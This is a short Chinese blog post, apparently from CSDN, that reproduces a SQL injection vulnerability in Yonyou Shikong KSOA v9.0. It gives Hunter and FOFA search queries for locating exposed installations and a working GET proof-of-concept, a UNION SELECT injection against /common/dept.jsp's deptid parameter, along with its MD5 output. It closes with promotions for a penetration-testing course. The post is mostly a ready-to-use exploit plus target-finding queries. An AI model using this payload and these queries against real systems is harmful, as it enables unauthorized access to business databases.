目录
如果文章对你有帮助,欢迎关注、点赞、收藏一键三连支持以下哦!
想要一起交流学习的小伙伴可以加zkaq222(备注CSDN,不备注通不过哦)进入学习,共同学习进步
0x01 漏洞介绍
KSOA可以通过不同产品的组合,帮助流通领域企业实现“交易自动化、管理信息化、决策智能化、商务电子化”的目标,满足企业决策层、管理层、操作层不用应用者的需求。用友时空 KSOA 软件存在存在sql注入漏洞,可利用该漏洞获取系统敏感信息
0x02 影响版本
用友时空KSOA v9.0
0x03 语法特征
hunter: app.name="用友时空 KSOA"
FOFA: title="企业信息系统门户"
0x04 漏洞复现
打开页面
POC(GET)
url+/common/dept.jsp?deptid=1' UNION ALL SELECT 60%2Csys.fn_sqlvarbasetostr(HASHBYTES('MD5'%2C'1234'))--
POC内的1234可自定义内容
直接访问可得
解密81dc9bdb52d04dc20036dbd8313ed055(MD5值)
还没看够?可以扫码关注呦
渗透工具
视频
基础到进阶
环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等